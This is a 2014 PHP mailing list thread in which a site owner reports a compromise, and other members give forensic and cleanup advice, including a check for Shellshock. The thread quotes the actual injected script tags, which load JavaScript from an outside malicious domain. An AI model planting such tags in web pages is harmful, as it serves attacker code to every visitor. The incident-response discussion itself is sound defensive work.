On 10/7/2014 9:08 PM, Richard wrote:
------------ Original Message ------------
Date: Tuesday, October 07, 2014 20:36:00 -0400
From: Jim Giner <jim.giner@xxxxxxxxxxxxxxxxxx>
To: php-general@xxxxxxxxxxxxx
Subject: Re: Re: hacked!!
On 10/7/2014 6:10 PM, Kevin Kinsey wrote:
On Fri, Oct 03, 2014 at 07:54:22PM -0400, Jim Giner wrote:
If anyone is interested here is what is being inserted into
random html and php files:
<!--f853a8--><script type="text/javascript"
src="http://hs-eventogbooking.dk/mytdhzzp.php?id=9625138";></scri
pt><!--/f853a8-->
and
<!--83b914--><script type="text/javascript"
src="http://n/mytdhzzp.php?id=9625233";></script><!--/83b914-->
Hi Jim,
Thanks for being open and sharing this information. I'm sorry I'm
late to the party.
IANAE on security, but I have some experience with forensics and
server administration as well as identifying attack vectors in
PHP and ColdFusion and mitigating them.
Off the top of my head, this *looks* a tad like code injection
via an unknown vector. By chance, are these code snippets
attached to the *end* of the files that contain them?
Keep copies of the infected files, with accurate timestamps for
the date of last modification.
If you can obtain server access logs, it would be prudent to
search them (with a "find" tool, like Unix 'grep' or the search
features of your favorite editor, for the strings in the HTML
comment sections, portions of the suspect URLs, etc.
Your web host will perhaps listen well if you pay them well, and
the less you pay them, the less likely they are to be concerned.
However, I would open a ticket and advise them of what has
occurred. Ask them some questions, like what kind of security
software is installed on their shared server, whether or not they
monitor network traffic for suspect packets, *whether or not the
server is vulnerable to "bash shell shock" (CVE-2014-6271 and
CVE-2014-7169) (also known as "bashdoor")*.
If your website has *no* third-party software built in, that's
good news, up to a point. It may indeed be that your code is
"tough enough" and the hole was not in your code. Given the
severity of ShellShock and the fact that your server contains
other peoples' sites as well, which may have 3rd party packages
that are vulnerable, I might think rather seriously about using a
VM, as others have suggested, in the future if at all feasible.
Hope this helps,
Kevin Kinsey
I'm afraid I can't keep the info you mentioned since I already
cleaned this up. Yes - some of the problem was with large chunks
of code at the bottom of a couple of index.php files. Most of it
was a small commented out piece of <script> code that called some
site in Germany. I have a utility to scan every file in my domain
that helped me find all the occurrences (about 30) which I then
updated after cleaning them.
Thanks for the tips tho.
When dealing with a hacked site it is always best to snapshot the
whole site - not limiting to the documentroot -- making certain to
preserve everything including file dates/times, permissions,
ownerships, etc., and capturing any hidden directories or files (a
common method for leaving backdoors) - before cleaning anything up.
That way there is something that can be reviewed at a later stage.
If you haven't been able to pinpoint the source of the intrusion, I
would suggest using your utility to scan your site on a very regular
basis.
- Richard
And that I am doing. And I am learning.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
